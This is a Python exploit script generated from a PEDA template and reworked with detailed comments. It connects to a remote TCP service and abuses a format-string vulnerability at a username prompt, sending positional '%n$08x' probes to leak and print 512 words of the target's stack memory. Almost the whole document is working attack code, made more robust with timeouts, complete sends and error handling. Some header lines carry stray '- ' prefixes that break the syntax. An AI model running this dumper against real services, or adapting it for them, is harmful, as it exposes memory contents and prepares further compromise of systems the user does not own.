- #!/usr/bin/env python
- #
- # Template for remote TCP exploit code, generated by PEDA
- #
- import os
- import sys
- import struct
- import resource
- import time
- import re
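def usage():
    """Print the command-line synopsis (``<argv0> host port``) to stdout.

    Returns None; the caller decides whether to exit.  Uses the single-argument
    ``print(...)`` form so the helper parses under both Python 2 and Python 3
    (the original Python 2 ``print`` statement is a syntax error on 3).
    """
    print("Usage: %s host port" % sys.argv[0])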
- from socket import *
- import telnetlib
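class TCPClient():
    """Minimal blocking TCP client used by the format-string stack dumper.

    Wraps one connected socket and adds optional traffic logging.
    ``debug`` levels: 0 = silent, 1 = log received data, 2 = also log
    sent data.  Payloads are handled as ``str`` exactly as the original
    Python 2 code does; no encoding or decoding is applied.
    """

    def __init__(self, host, port, debug=0, timeout=None):
        """Connect to ``host``:``port``.

        ``timeout`` (seconds, None = fully blocking, the original behaviour)
        is applied before connecting so a dead or stalling target raises
        ``socket.timeout`` instead of hanging the dumper forever.  If the
        connect fails the socket is closed before the error propagates, so
        a failed attempt does not leak a descriptor.
        """
        self.debug = debug
        self.sock = socket(AF_INET, SOCK_STREAM)
        if timeout is not None:
            self.sock.settimeout(timeout)
        try:
            self.sock.connect((host, port))
        except Exception:
            self.sock.close()
            raise

    def __enter__(self):
        """Allow ``with TCPClient(...) as c:``; the socket is closed on exit."""
        return self

    def __exit__(self, exc_type, exc, tb):
        self.close()
        return False

    def debug_log(self, size, data, cmd):
        """Print one traffic line, ``cmd(size): repr(data)``, unless debug is 0."""
        if self.debug != 0:
            print("%s(%d): %s" % (cmd, size, repr(data)))

    def send(self, data, delay=0):
        """Send all of ``data`` after an optional ``delay`` (seconds).

        Returns the number of bytes sent, which is always ``len(data)`` on
        success.  ``socket.send`` may write only part of a buffer; the
        original returned that partial count and silently dropped the rest,
        which truncates the payload the target sees.  Raises ``EOFError``
        if the socket reports zero bytes written.
        """
        if delay:
            time.sleep(delay)
        total = 0
        while total < len(data):
            sent = self.sock.send(data[total:])
            if sent == 0:
                raise EOFError("connection closed while sending")
            total += sent
        if self.debug > 1:
            self.debug_log(total, data, "send")
        return total

    def sendline(self, data, delay=0):
        """Send ``data`` followed by a newline; returns the byte count sent."""
        return self.send(data + "\n", delay)

    def recv(self, size=1024, delay=0):
        """Receive up to ``size`` bytes after an optional ``delay``; may return fewer."""
        if delay:
            time.sleep(delay)
        buf = self.sock.recv(size)
        if self.debug > 0:
            self.debug_log(len(buf), buf, "recv")
        return buf

    def recv_until(self, delim):
        """Read byte by byte until ``delim`` has been seen; return everything read.

        Raises ``EOFError`` when the peer closes the connection before
        ``delim`` arrives -- a closed socket returns empty reads, on which
        the original looped forever.
        """
        buf = ""
        while True:
            c = self.sock.recv(1)
            if not c:
                raise EOFError("connection closed before %r was received" % delim)
            buf += c
            if delim in buf:
                break
        self.debug_log(len(buf), buf, "recv")
        return buf

    def recvline(self):
        """Read up to and including the next newline."""
        return self.recv_until("\n")

    def close(self):
        """Close the underlying socket."""
        self.sock.close()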
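def _leak_word(client, index):
    """Run one prompt cycle against ``client`` and return the value leaked for ``index``.

    The username prompt is answered with the positional format string
    ``%<index>$08x``; presumably the target passes that field unsanitised to a
    printf-family call, so the echoed "username" in the result message is the
    index-th stack argument rendered as 8 hex digits.  Assumes every prompt
    arrives in a single recv() -- TODO confirm against the target; if prompts
    fragment, replace the recv(1024) calls with recv_until on the prompt text.
    Raises ``ValueError`` if the reply contains no single-quoted value.
    """
    # username prompt: send the probe
    client.recv(1024)
    client.send("%{0}$08x".format(index) + '\n')
    # password prompt: empty answer
    client.recv(1024)
    client.send('\n')
    # email prompt: empty answer
    client.recv(1024)
    client.send('\n')
    # the result message echoes the expanded username inside single quotes
    quoted = re.findall(r"'(.*?)'", client.recv(1024))
    if not quoted:
        raise ValueError("no quoted value in the reply for argument %d" % index)
    # retry prompt: answer yes to keep the session open for the next probe
    client.recv(1024)
    client.send('yes\n')
    return quoted[0]


def _print_stack(stack, per_row=4):
    """Print the leaked words ``per_row`` per line, prefixed by the 1-based index of the first.

    A trailing partial row is printed too (the original silently dropped it
    when the count was not a multiple of four).
    """
    # NOTE(review): these strings are target-controlled and printed verbatim;
    # use repr() if the terminal may interpret escape sequences.
    for start in range(0, len(stack), per_row):
        row = stack[start:start + per_row]
        print('%08d: %s' % (start + 1, ' '.join(row)))


def exploit(host, port, count=512):
    """Dump ``count`` stack words from ``host``:``port`` through the format-string leak.

    ``port`` may be a string (it is converted with int()).  ``count`` defaults
    to 512 words, which the original comment equates to 2048 bytes -- i.e. it
    presumably assumes 4-byte stack slots (32-bit target).  Prints the words
    four per line and exits with status 1, after reporting the error, if any
    round fails; the original bound ``client`` inside the try, so a failed
    connect raised a second exception in the handler, and its bare ``exit()``
    swallowed the cause entirely.  The connection is always closed.
    """
    stack = []
    client = None
    try:
        client = TCPClient(host, int(port), debug=0)
        print('[+] Stack dumper started')
        for index in range(1, count + 1):
            stack.append(_leak_word(client, index))
    except Exception as err:
        print('[-] Stack dumper aborted after %d/%d words: %s' % (len(stack), count, err))
        sys.exit(1)
    finally:
        if client is not None:
            client.close()
    _print_stack(stack)
    print('[-] Stack dumper finished')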
if __name__ == "__main__":
    # Positional CLI: <host> <port>.  Anything shorter prints the usage text
    # and falls through without an explicit exit status, as before.
    args = sys.argv[1:]
    if len(args) >= 2:
        exploit(args[0], args[1])
    else:
        usage()